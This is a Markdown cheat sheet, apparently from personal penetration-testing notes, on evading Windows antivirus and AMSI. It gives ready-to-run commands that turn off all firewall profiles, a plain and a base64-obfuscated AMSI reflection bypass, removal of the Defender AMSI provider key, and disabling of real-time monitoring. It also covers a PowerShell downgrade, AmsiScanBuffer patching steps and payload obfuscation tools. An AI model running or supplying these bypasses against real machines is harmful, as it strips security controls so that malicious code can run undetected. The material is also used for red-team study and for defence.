189 lines
6.5 KiB
Markdown
189 lines
6.5 KiB
Markdown
# Antivirus Evasion
|
|
|
|
* Existing types
|
|
* On-Disk evasion
|
|
* In-Memory evasion
|
|
|
|
* Detection Methods
|
|
* Static Detection -- Hash or String/Byte Matching
|
|
* Dynamic -- predefined rules, run inside a sandbox, querying API and syscalls at runtime
|
|
* Heuristic / Behaviourial Detection -- threshold hits by either static comparison of decompiled code or dynamically analyzed software
|
|
|
|
* Additional Features
|
|
* Unpacker -- decrypting and decompress
|
|
* PE header parser -- portable executable headers are parsed
|
|
* Emulation -- analysis in an emulated env
|
|
|
|
## Enumeration
|
|
|
|
```sh
|
|
wmic /namespace:\\root\securitycenter2 path antivirusproduct
|
|
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
|
|
```
|
|
```sh
|
|
Get-Service WinDefend
|
|
Get-MpComputerStatus | select RealTimeProtectionEnabled
|
|
```
|
|
* Check firewall
|
|
```sh
|
|
Get-NetFirewallProfile | Format-Table Name, Enabled
|
|
```
|
|
```sh
|
|
Get-NetFirewallRule | select DisplayName, Enabled, Description
|
|
```
|
|
* Check inbound port availability
|
|
```sh
|
|
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
|
|
```
|
|
|
|
* Check Windows Defender and its active rules
|
|
```sh
|
|
powershell -c "Get-MpPreference"
|
|
powershell -c "Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Id
|
|
```
|
|
|
|
* Check tamper protection, and [bypass](https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d#file-doh-ps1)
|
|
```sh
|
|
reg query "HKLM\Software\Microsoft\Windows Defender\Features" /v TamperProtection
|
|
```
|
|
|
|
## Reset Options
|
|
```sh
|
|
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
|
|
```
|
|
|
|
## Anti Malware Secure Interface
|
|
|
|
* Powershell .NET runtime detection measure of windows. Scans code before executed.
|
|
* https://docs.microsoft.com/en-us/windows/win32/amsi/
|
|
* https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions
|
|
* https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream
|
|
* Integrated inside components
|
|
* User Account Control (UAC)
|
|
* Powershell
|
|
* Windows Script Host (wscript, csrcipt)
|
|
* JavaScript and VBScript
|
|
* VBA macros
|
|
* `System.Management.Automation.dll`
|
|
|
|
* Flow
|
|
```
|
|
| Win32 API | COM API | AV Provider |
|
|
Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan() --> IAntiMalwareProvider::Scan()
|
|
```
|
|
|
|
### Return Result/Response Codes
|
|
```
|
|
AMSI_RESULT_CLEAN = 0
|
|
AMSI_RESULT_NOT_DETECTED = 1
|
|
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
|
|
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
|
|
AMSI_RESULT_DETECTED = 32768
|
|
```
|
|
|
|
### PowerShell Downgrade Attack
|
|
|
|
* Downgrade Powershell version to 2.0, where no AMSI is implemented
|
|
```sh
|
|
PowerShell -Version 2
|
|
```
|
|
|
|
* [Unicorn](https://github.com/trustedsec/unicorn) does leverage this
|
|
|
|
### Reflection Bypass
|
|
|
|
* Varying string concatenation and camelCasing variations of the following string by Matt Graeber
|
|
* [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
|
|
```sh
|
|
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
|
|
```
|
|
or an obfuscated version
|
|
```sh
|
|
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
|
|
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
|
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
|
```
|
|
|
|
### AMSI ScanBuffer patch
|
|
|
|
* Patching `amsi.dll`, which is loaded at Powershell startup
|
|
* AMSI ScanBuffer is delivered to `amsi.dll`
|
|
|
|
* Get handle of `amsi.dll`
|
|
* Get process address of AmsiScanBuffer
|
|
* Modify mem protection of AmsiScanBuffer
|
|
* Write opcode to AMSIScanBuffer
|
|
|
|
* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py)
|
|
* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs)
|
|
|
|
### Other Bypasses and Tools
|
|
|
|
* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)
|
|
|
|
* [amsifail](http://amsi.fail/) generates obfuscated snippets
|
|
|
|
### Validate
|
|
|
|
* [AMSITrigger](https://github.com/RythmStick/AMSITrigger) identifies strings which trigger the AMSI functions
|
|
* Validate Obfuscation and check which strings trigger AMSI
|
|
* [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger)
|
|
```sh
|
|
.\\AMSITrigger.exe -u <URL> -f 1
|
|
```
|
|
or
|
|
```sh
|
|
.\\AMSITrigger.exe -i <file> -f 1
|
|
```
|
|
### Further Obfuscation
|
|
|
|
* String concatenation
|
|
```sh
|
|
$OBF = 'Ob' + 'fu' + 's' +'cation'
|
|
```
|
|
* `Concatenate - ('co'+'ffe'+'e')`
|
|
* `Reorder - ('{1}{0}'-f'ffee','co')`
|
|
* `Whitespace - ( 'co' +'fee' + 'e')`
|
|
|
|
#### Type Obfuscation
|
|
|
|
* .NET has type accelerators as aliases for types to shorten them and break the signature.
|
|
* [idera](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell)
|
|
* [0x00-0x00](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html)
|
|
* [Documentation at microsoft](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1)
|
|
|
|
* Example
|
|
* Without
|
|
```sh
|
|
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
|
|
```
|
|
* With
|
|
```sh
|
|
[dorkstork]::copy($buf, 0, $BufferAddress, 6);
|
|
```
|
|
|
|
### Automated Obfuscation
|
|
|
|
#### Powershell
|
|
|
|
* [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)
|
|
* [Daniel's guide to Invoke-Obfuscation](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide)
|
|
```sh
|
|
Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit
|
|
```
|
|
* [__8191 character limit__](https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation) of command prompt must not be exceeded.
|
|
|
|
#### Other Obfuscation
|
|
|
|
* Pinpoint bytes that will be flagged with [ThreadCheck](https://github.com/rasta-mouse/ThreatCheck)
|
|
* Has to be build via VS. Will output a ddll, an excutable and an XML file.
|
|
* `ThreatCheck.exe -f <file>`
|
|
* [DefenderCheck](https://github.com/matterpreter/DefenderCheck)
|
|
|
|
## Links
|
|
|
|
* [cmnatic](https://cmnatic.co.uk/)
|
|
* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)
|
|
* [s3cur3th1ssh1t](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/)
|
|
* [amsi.fail](https://amsi.fail/)
|